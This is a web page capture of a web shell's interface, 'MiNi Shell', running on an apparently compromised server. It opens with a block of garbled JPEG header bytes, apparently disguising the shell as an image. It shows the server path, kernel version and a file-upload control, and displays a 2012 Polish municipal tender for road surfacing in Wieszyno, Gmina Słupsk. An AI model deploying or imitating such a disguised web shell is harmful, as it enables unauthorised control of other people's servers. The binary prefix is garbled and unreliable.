JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120813/174625-N-2012.html

<p class="kh_header"><b>Słupsk: Utwardzenie nawierzchni dróg polegające na przebudowie i remoncie przejętych dróg na wiejskim osiedlu popegeerowskim w miejscowości Wieszyno - Gmina Słupsk</b><br>
<b>Numer ogłoszenia: 174625 - 2012; data zamieszczenia: 13.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Słupsk , ul. Sportowa 34, 76-200 Słupsk, woj. pomorskie, tel. 0-59 842 84 60, 842 92 54, faks 059 8429254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slupsk.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utwardzenie nawierzchni dróg polegające na przebudowie i remoncie przejętych dróg na wiejskim osiedlu popegeerowskim w miejscowości Wieszyno - Gmina Słupsk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem przetargu jest utwardzenie nawierzchni dróg polegające na przebudowie i remoncie przejętych dróg na wiejskim osiedlu popegeerowskim w miejscowości Wieszyno - Gmina Słupsk:
1) ZADANIE I - utwardzenie nawierzchni drogi na działce nr 58/3:
a)roboty pomiarowe przy liniowych robotach ziemnych w terenie równinnym - 0,017 km,
b) roboty ziemne z transportem urobku na odległość do 1 km - grunt kategorii III, wykonanie koryta o głębokości 40 cm - 30,600 m3,
c) profilowanie i zagęszczanie ręczne podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kategorii III-IV - 76,500 m2,
d) warstwa odsączająca grubości (po zagęszczeniu) 10 cm w korycie lub na całej szerokości drogi (zagęszczana mechanicznie) - 76,500 m2,
e) ława betonowa z oporem pod krawężniki z betonu B-15 - 2,500 m3,
f) krawężniki betonowe o wymiarach 12x25 cm wtopione na podsypce piaskowej - 42,000 m,
g) warstwa dolna podbudowy z kruszywa łamanego o gr. (po zagęszczeniu) 15 cm - 51,000 m2,
h) nawierzchnie z kostki brukowej betonowej grubości 8 cm, układane na podsypce cementowo - piaskowej, kostka kolorowa - 3,400 m2,
i) nawierzchnie z kostki brukowej betonowej grubości 8 cm, układane na podsypce piaskowej, kostka szara - 13,600 m2,
j) nawierzchnie z płyt drogowych betonowych kwadratowych o grubości 12 cm (typ MEBA), z wypełnieniem spoin piaskiem - 34,000 m2,
k) wyrównywanie poboczy gruntem rodzimym zagęszczanym mechanicznie o średniej grubości warstwy (po zagęszczeniu) do 10 cm - 2,500 m3.
2) ZADANIE II - utwardzenie nawierzchni drogi na działkach 23/6 i 4/5:
a) roboty pomiarowe przy liniowych robotach ziemnych w terenie równinnym - 0,058 km,
b) roboty ziemne z transportem urobku na odległość do 1 km - grunt kategorii III, wykonanie koryta o głębokości 40 cm - 108,400 m3,
c) profilowanie i zagęszczanie ręczne podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kategorii III-IV - 271,000 m2,
d) warstwa odsączająca grubości (po zagęszczeniu 10 cm) w korycie lub na całej szerokości drogi (zagęszczana mechanicznie) - 271,000 m2,
e) ława betonowa z oporem z betonu B-15 pod krawężniki - 7,700 m3,
f) krawężniki betonowe o wymiarach 12x25 cm wtopione na podsypce piaskowej - 128,000 m,
g) warstwa dolna podbudowy z kruszywa łamanego o gr. (po zagęszczeniu 15 cm) - 242,000 m2,
h)nawierzchnie z kostki brukowej betonowej grubości 8 cm, układane na podsypce cementowo - piaskowej, kostka kolorowa - 11,600 m2,
i) nawierzchnie z kostki brukowej betonowej grubości 8 cm, układane na podsypce piaskowej, kostka szara - 48,900 m2,
j) nawierzchnie z płyt drogowych betonowych kwadratowych o grubości 12 cm (typ MEBA), z wypełnieniem spoin piaskiem - 181,500 m2,
k) wyrównywanie poboczy gruntem rodzimym zagęszczanym mechanicznie o średniej grubości warstwy po zagęszczeniu do 10 cm - 8,700 m3.
3) ZADANIE III - utwardzenie nawierzchni drogi na działce nr 101:
a) roboty pomiarowe przy liniowych robotach ziemnych w terenie równinnym - 0,070 km,
b) roboty ziemne z transportem urobku na odległość do 1 km - grunt kategorii III, wykonanie koryta o głębokości 40 cm - 130,000 m3,
c) profilowanie i zagęszczanie ręczne podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kategorii III-IV - 325,000 m2,
d) warstwa odsączająca grubości (po zagęszczeniu) 10 cm w korycie lub na całej szerokości drogi (zagęszczana mechanicznie) - 325,000 m2,
e) ława betonowa z oporem z betonu B-15 pod krawężniki - 9,120 m3,
f) krawężniki betonowe o wymiarach 12x25 cm wtopione na podsypce piaskowej - 152,000 m,
g) warstwa dolna podbudowy z kruszywa łamanego o gr. (po zagęszczeniu) 15 cm - 290,000 m2,
h) nawierzchnie z kostki brukowej betonowej grubości 8 cm, układane na podsypce cementowo - piaskowej, kostka kolorowa - 14,000 m2,
i) nawierzchnie z kostki brukowej betonowej grubości 8 cm, układane na podsypce piaskowej, kostka szara - 58,500 m2,
j) nawierzchnie z płyt drogowych betonowych kwadratowych o grubości 12 cm (typ MEBA), z wypełnieniem spoin piaskiem - 217,500 m2,
k) regulacja pionowa włazów kanałowych - 2,000 szt.,
l) regulacja zaworów wodociągowych i gazowych - 2,000 szt.,
m) wyrównywanie poboczy gruntem rodzimym (zagęszczanym mechanicznie) o średniej grubości warstwy (po zagęszczeniu) do 10 cm - 10,500 m3.
4) ZADANIE IV - utwardzenie nawierzchni drogi na działce nr 97:
a)roboty pomiarowe przy liniowych robotach ziemnych w terenie równinnym - 0,064 km,
b) roboty ziemne z transportem urobku na odległość do 1 km - grunt kategorii III, wykonanie koryta o głębokości 40 cm - 119,200 m3,
c) profilowanie i zagęszczanie ręczne podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kategorii III-IV - 298,000 m2,
d) warstwa odsączająca grubości (po zagęszczeniu) 10 cm w korycie lub na całej szerokości drogi (zagęszczana mechanicznie) - 298,000 m2,
e) ława betonowa z oporem z betonu B-15 pod krawężniki - 8,400 m3,
f) krawężniki betonowe o wymiarach 12x25 cm wtopione na podsypce piaskowej - 140,000 m,
g) warstwa dolna podbudowy z kruszywa łamanego o gr. (po zagęszczeniu) 15 cm -  266,000 m2,
h) nawierzchnie z kostki brukowej betonowej grubości 8 cm, układane na podsypce cementowo - piaskowej, kostka kolorowa - 12,800 m2,
i) nawierzchnie z kostki brukowej betonowej grubości 8 cm, układane na podsypce piaskowej, kostka szara - 53,700 m2,
j) nawierzchnie z płyt drogowych betonowych kwadratowych o grubości 12 cm (typ MEBA), z wypełnieniem spoin piaskiem - 199,500 m2,
k) regulacja pionowa włazów kanałowych - 2,000 szt.,
l) regulacja zaworów wodociągowych i gazowych - 2,000 szt.,
m) wyrównywanie poboczy gruntem rodzimym (zagęszczanym mechanicznie) o średniej grubości warstwy (po zagęszczeniu) do 10 cm - 9,600 m3.
5) ZADANIE V - utwardzenie nawierzchni drogi na części działki nr 25/2 (gminna):
a) roboty pomiarowe przy liniowych robotach ziemnych w terenie równinnym - 0,035 km,
b) roboty ziemne z transportem urobku na odległość do 1 km - grunt kategorii III, wykonanie koryta o głębokości 40 cm - 63,000 m3,
c) profilowanie i zagęszczanie ręczne podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kategorii III-IV - 167,500 m2,
d) warstwa odsączająca grubości (po zagęszczeniu) 10 cm w korycie lub na całej szerokości drogi (zagęszczana mechanicznie) - 167,500 m2,
e) ława betonowa z oporem z betonu B-15 pod krawężniki - 5,000 m3,
f)krawężniki betonowe o wymiarach 12x25 cm wtopione na podsypce piaskowej - 84,000 m,
g) warstwa dolna podbudowy z kruszywa łamanego o gr. (po zagęszczeniu) 15 cm - 150,000 m2,
h) nawierzchnie z kostki brukowej betonowej grubości 8 cm, układane na podsypce cementowo - piaskowej, kostka kolorowa - 7,000 m2,
i) nawierzchnie z kostki brukowej betonowej grubości 8 cm, układane na podsypce piaskowej, kostka szara - 30,500 m2,
j) nawierzchnie z płyt drogowych betonowych kwadratowych o grubości 12 cm (typ MEBA), z wypełnieniem spoin piaskiem - 112,500 m2,
k) regulacja pionowa włazów kanałowych - 2,000 szt.,
l) regulacja zaworów wodociągowych i gazowych - 2,000 szt.,
m) wyrównywanie poboczy gruntem rodzimym (zagęszczanym mechanicznie) o średniej grubości warstwy (po zagęszczeniu) do 10 cm - 5,200 m3.
6) badania laboratoryjne składu wbudowanych materiałów,
7) badania wskaźnika zagęszczenia podbudowy,
8) badania równości podłużnej i poprzecznej,
9) spadki poprzeczne nawierzchni,
10) inwentaryzacja powykonawcza,
11) opracowanie pozostałej dokumentacji niezbędnej do odbioru ostatecznego.
2. Szczegółowy zakres robót został określony w przedmiarach robót - zał. nr 10 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wadium w wysokości: 4 000,00 zł (słownie: cztery tysiące złotych 00/100). 2Wadium należy wnieść przed upływem terminu do składania ofert. 3Wykonawca może wnieść wadium w:
1) pieniądzu,
2) poręczeniach bankowych,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.). 
2. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w BANK SPÓŁDZIELCZY w Ustce na konto Nr 77 9315 0004 0050 3934 2000 0020. Potwierdzoną przez bank kopię przelewu należy dołączyć do oferty. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
3. W przypadku wniesienia wadium w pozostałych formach innych niż pieniądz określonych w pkt 3 ppkt 2 - 5 należy złożyć oryginał dokumentu wadium w kasie Urzędu Gminy w Słupsku, ul. Sportowa 34, 76-200 Słupsk (w godz. 8.00 - 14.00), lub dołączyć oryginał dokumentu wadium do oferty, w osobnej koszulce - nie łączyć go na trwale z ofertą. Ponadto w obydwu przypadkach kopię dokumentu wadium potwierdzoną za zgodność z oryginałem (przez Wykonawcę) należy dołączyć do oferty. 
4. Wniesione wadium Zamawiający zwraca na zasadach określonych w ustawie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Posiadanie lub dysponowanie wiedzą i doświadczeniem w zakresie prac stanowiących przedmiot przetargu tj. wykonanie w okresie pięciu ostatnich lat przed upływem terminu do składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech robót (tj.: odrębne umowy lub zlecenia) budowlanych w branży drogowej w zakresie budowy, przebudowy lub remontu dróg z płyt lub kostki betonowej, o powierzchni co najmniej  800 m2 każda.
2. Obowiązek złożenia dokumentów potwierdzających należyte wykonanie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednim potencjałem technicznym do wykonania zamówienia - oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dysponowanie następującymi osobami, które będą uczestniczyć w wykonywaniu zamówienia tj.: kierownikiem budowy, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w branży drogowej, lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz jest członkiem odpowiedniej izby samorządu zawodowego. 2.Złożenie stosownych oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdowanie się w sytuacji finansowej zapewniającej wykonanie zamówienia - oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy - kalkulacja uproszczona.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany treści umowy:
1) w zakresie zmiany terminu wykonania w przypadku:
a) wystąpienia siły wyższej (zgodnie z § 3 wzoru umowy - zał. nr 9 do SIWZ),
b) opóźnienia w przekazaniu placu budowy z winy Zamawiającego,
c) wad i braków w obmiarze przedmiaru lub innych dokumentów budowy,
d) wykopalisk lub innych przeszkód uniemożliwiających prowadzenie robót,
e) zmiany zakresu przedmiotu umowy wynikającej z inicjatywy Zamawiającego lub okoliczności które uniemożliwiają należyte wykonanie przedmiotu umowy,
f) zawieszenia robót przez Zamawiającego,
g) niewypałów i niewybuchów, ujawnienia niezinwentaryzowanych lub błędnie zinwentaryzowanych instalacji podziemnych,
2) zmianę (zmniejszenie) wynagrodzenia:
a) w przypadku ograniczenia zakresu przedmiotu umowy lub zmian technologicznych korzystnych dla Zamawiającego lub zastosowania przez Wykonawcę preferencji cenowych,
b) o wartość robót nie wykonanych, a ujętych w cenie zaoferowanej przez Wykonawcę,
3) możliwość wprowadzenia innych rozwiązań technologicznych usprawniających wykonanie zamówienia ze względów technicznych lub finansowych z zastrzeżeniem, że zmiany nie mają istotnego wpływu na pierwotne warunki udziału w postępowaniu oraz na pierwotny przedmiot zamówienia określony w SIWZ. Niniejsza zmiana musi być zaakceptowana przez Zamawiającego i Wykonawcę,
4) zmian obligatoryjnych wynikających ze zmian przepisów prawa, niezależnych od stron,
5) zmianę wynagrodzenia w przypadku zmiany ustawowej stawki VAT,
6) zmiana zakresu robót powierzonego podwykonawcom z zastrzeżeniem § 8 wzoru umowy.
2. W zakresie zmiany wynagrodzenia dotyczącego robót zamiennych Zamawiający dopuszcza taką możliwość jeżeli wartość tych robót nie przekroczy ceny zaoferowanej przez Wykonawcę i ujętej w umowie. W przypadku potrzeby zrealizowania robót zamiennych znacznie przekraczających po zmianach cenę zamówienia Zamawiający ograniczy pierwotny zakres prac podlegający zmianom wraz ze zmniejszeniem wynagrodzenia. Natomiast nowe (zamienne) prace zleci w ramach robót dodatkowych, które będą realizowane odrębnym zamówieniem</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.gminaslupk.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego - Urząd Gminy Słupsk, ul. Sportowa 34, 76-200 Słupsk - pok. nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2012 godzina 14:00, miejsce: Siedziba Zamawiającego - Urząd Gminy Słupsk, ul. Sportowa 34, 76-200 Słupsk - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje, że inwestycja w części zadań od nr do nr 4 dofinansowana będzie ze środków Agencji Nieruchomości Rolnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com